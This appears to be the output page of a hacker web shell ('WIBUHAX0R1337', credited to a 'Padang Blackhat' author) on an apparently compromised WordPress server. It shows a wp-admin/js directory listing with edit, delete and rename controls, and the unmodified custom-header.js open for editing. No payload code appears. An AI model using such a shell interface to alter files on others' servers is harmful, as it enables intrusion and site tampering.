-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
www
/
wp-admin
/
js
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
widgets
--
NONE
wp
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
application-passwords.js
6.244KB
Edit File
Delete File
Rename
code-editor.js
11.316KB
Edit File
Delete File
Rename
code-editor.min.js
3.011KB
Edit File
Delete File
Rename
common.js
61.15KB
Edit File
Delete File
Rename
custom-background.js
3.354KB
Edit File
Delete File
Rename
custom-header.js
1.976KB
Edit File
Delete File
Rename
customize-controls.js
287.36KB
Edit File
Delete File
Rename
customize-controls.min.js
109.14KB
Edit File
Delete File
Rename
customize-nav-menus.js
111.131KB
Edit File
Delete File
Rename
customize-nav-menus.min.js
46.929KB
Edit File
Delete File
Rename
customize-widgets.js
70.046KB
Edit File
Delete File
Rename
customize-widgets.min.js
27.407KB
Edit File
Delete File
Rename
edit-comments.js
37.115KB
Edit File
Delete File
Rename
editor-expand.js
41.607KB
Edit File
Delete File
Rename
editor.js
43.98KB
Edit File
Delete File
Rename
image-edit.js
39.977KB
Edit File
Delete File
Rename
link.js
3.894KB
Edit File
Delete File
Rename
password-toggle.js
1.308KB
Edit File
Delete File
Rename
plugin-install.js
6.92KB
Edit File
Delete File
Rename
svg-painter.min.js
1.53KB
Edit File
Delete File
Rename
tags-box.js
10.879KB
Edit File
Delete File
Rename
tags-box.min.js
3.005KB
Edit File
Delete File
Rename
tags-suggest.js
5.636KB
Edit File
Delete File
Rename
tags-suggest.min.js
2.216KB
Edit File
Delete File
Rename
tags.js
4.851KB
Edit File
Delete File
Rename
tags.min.js
2.042KB
Edit File
Delete File
Rename
theme-plugin-editor.js
24.766KB
Edit File
Delete File
Rename
theme-plugin-editor.min.js
11.435KB
Edit File
Delete File
Rename
widgets.js
22.557KB
Edit File
Delete File
Rename
/** * @output wp-admin/js/custom-header.js */ /* global isRtl */ /** * Initializes the custom header selection page. * * @since 3.5.0 * * @deprecated 4.1.0 The page this is used on is never linked to from the UI. * Setting a custom header is completely handled by the Customizer. */ (function($) { var frame; $( function() { // Fetch available headers. var $headers = $('.available-headers'); // Apply jQuery.masonry once the images have loaded. $headers.imagesLoaded( function() { $headers.masonry({ itemSelector: '.default-header', isRTL: !! ( 'undefined' != typeof isRtl && isRtl ) }); }); /** * Opens the 'choose from library' frame and creates it if it doesn't exist. * * @since 3.5.0 * @deprecated 4.1.0 * * @return {void} */ $('#choose-from-library-link').on( 'click', function( event ) { var $el = $(this); event.preventDefault(); // If the media frame already exists, reopen it. if ( frame ) { frame.open(); return; } // Create the media frame. frame = wp.media.frames.customHeader = wp.media({ // Set the title of the modal. title: $el.data('choose'), // Tell the modal to show only images. library: { type: 'image' }, // Customize the submit button. button: { // Set the text of the button. text: $el.data('update'), // Tell the button not to close the modal, since we're // going to refresh the page when the image is selected. close: false } }); /** * Updates the window location to include the selected attachment. * * @since 3.5.0 * @deprecated 4.1.0 * * @return {void} */ frame.on( 'select', function() { // Grab the selected attachment. var attachment = frame.state().get('selection').first(), link = $el.data('updateLink'); // Tell the browser to navigate to the crop step. window.location = link + '&file=' + attachment.id; }); frame.open(); }); }); }(jQuery));
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat